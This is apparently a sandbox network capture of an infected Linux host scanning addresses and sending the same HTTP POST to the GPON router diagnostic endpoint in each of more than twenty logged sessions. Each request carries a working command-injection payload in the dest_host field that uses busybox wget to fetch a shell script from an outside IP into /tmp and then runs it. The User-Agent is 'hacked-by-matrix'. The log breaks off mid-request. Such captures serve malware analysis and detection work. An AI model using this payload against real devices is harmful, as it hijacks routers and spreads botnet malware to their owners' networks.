                                                        Mar 21, 2024 05:21:47.402033091 CET50736443192.168.2.135.118.51.66
                                                        Mar 21, 2024 05:21:47.402045012 CET443507365.118.51.66192.168.2.13
                                                        Mar 21, 2024 05:21:47.402062893 CET50736443192.168.2.13212.5.239.105
                                                        Mar 21, 2024 05:21:47.402084112 CET50736443192.168.2.135.118.51.66
                                                        Mar 21, 2024 05:21:47.402084112 CET50736443192.168.2.135.91.87.105
                                                        Mar 21, 2024 05:21:47.402091980 CET50736443192.168.2.13212.1.199.125
                                                        Mar 21, 2024 05:21:47.402095079 CET50736443192.168.2.1342.184.180.231
                                                        Mar 21, 2024 05:21:47.402095079 CET50736443192.168.2.13109.9.221.243
                                                        Mar 21, 2024 05:21:47.402101994 CET44350736212.1.199.125192.168.2.13
                                                        Mar 21, 2024 05:21:47.402112007 CET50736443192.168.2.13118.140.70.237
                                                        Mar 21, 2024 05:21:47.402115107 CET50736443192.168.2.13212.172.144.52
                                                        Mar 21, 2024 05:21:47.402116060 CET4435073642.184.180.231192.168.2.13
                                                        Mar 21, 2024 05:21:47.402115107 CET50736443192.168.2.13109.116.191.83
                                                        Mar 21, 2024 05:21:47.402117014 CET44350736109.9.221.243192.168.2.13
                                                        Mar 21, 2024 05:21:47.402121067 CET50736443192.168.2.13212.1.199.125
                                                        Mar 21, 2024 05:21:47.402121067 CET5176055555192.168.2.13172.174.49.117
                                                        Mar 21, 2024 05:21:47.402127028 CET50736443192.168.2.1342.35.152.79
                                                        Mar 21, 2024 05:21:47.402127981 CET44350736118.140.70.237192.168.2.13
                                                        Mar 21, 2024 05:21:47.402129889 CET5176055555192.168.2.13172.122.96.75
                                                        Mar 21, 2024 05:21:47.402129889 CET5176055555192.168.2.13184.197.178.138
                                                        Mar 21, 2024 05:21:47.402132034 CET50736443192.168.2.13118.186.165.241
                                                        Mar 21, 2024 05:21:47.402137995 CET4435073642.35.152.79192.168.2.13
                                                        Mar 21, 2024 05:21:47.402137995 CET50736443192.168.2.13109.234.17.49
                                                        Mar 21, 2024 05:21:47.402138948 CET44350736212.172.144.52192.168.2.13
                                                        Mar 21, 2024 05:21:47.402142048 CET50736443192.168.2.1342.172.183.122
                                                        Mar 21, 2024 05:21:47.402148008 CET44350736109.234.17.49192.168.2.13
                                                        Mar 21, 2024 05:21:47.402148962 CET50736443192.168.2.13212.29.81.183
                                                        Mar 21, 2024 05:21:47.402148962 CET50736443192.168.2.13212.255.218.251
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.1352344212.5.239.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.430882931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.13500325.91.87.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.430918932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.1358790212.1.199.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.430927038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.135088642.184.180.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.430958033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.1347356109.9.221.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.430982113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.133340442.35.152.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431016922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.1347082118.140.70.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431076050 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.1356342109.234.17.49443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431092978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.1348824118.186.165.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431134939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.1360360212.172.144.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431170940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.133754842.172.183.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431200981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.1342812109.116.191.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431257963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.1356200212.29.81.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431277037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.1336292212.255.218.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431294918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.13542865.65.55.132443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431363106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.1341974109.164.24.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431396008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.1360318212.250.48.204443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431416988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.1349828109.14.220.179443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431437969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.1335318212.12.204.157443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431516886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.13478485.62.151.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431538105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.135293642.251.21.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431574106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.1352266109.181.73.108443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431596994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
